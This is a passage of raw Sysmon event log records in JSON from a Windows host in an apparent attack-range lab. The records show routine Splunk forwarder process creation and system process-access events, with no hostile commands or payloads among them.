{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3380,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.354\r\nProcessGuid: {A837DB8D-023B-5F25-0000-0010A03F0500}\r\nProcessId: 4552\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-regex --log-warnings\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {A837DB8D-023A-5F25-0000-001019300500}\r\nParentProcessId: 4368\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.354","ProcessGuid":"{A837DB8D-023B-5F25-0000-0010A03F0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-regex --log-warnings","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{A837DB8D-023A-5F25-0000-001019300500}","ParentProcessId":"4368","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3381,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.341\r\nSourceProcessGUID: {A837DB8D-023A-5F25-0000-001019300500}\r\nSourceProcessId: 4368\r\nSourceThreadId: 3288\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {A837DB8D-020E-5F25-0000-001035E50400}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+181c6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.341","SourceProcessGUID":"{A837DB8D-023A-5F25-0000-001019300500}","SourceProcessId":"4368","SourceThreadId":"3288","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{A837DB8D-020E-5F25-0000-001035E50400}","TargetProcessId":"4552","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+181c6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3382,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.341\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-020E-5F25-0000-001035E50400}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.341","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-020E-5F25-0000-001035E50400}","TargetProcessId":"4552","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3383,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.341\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.341","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3384,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.341\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.341","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3385,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.341\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.341","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3386,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.341\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.341","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3387,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.341\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:43.341","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3388,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:43.341\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 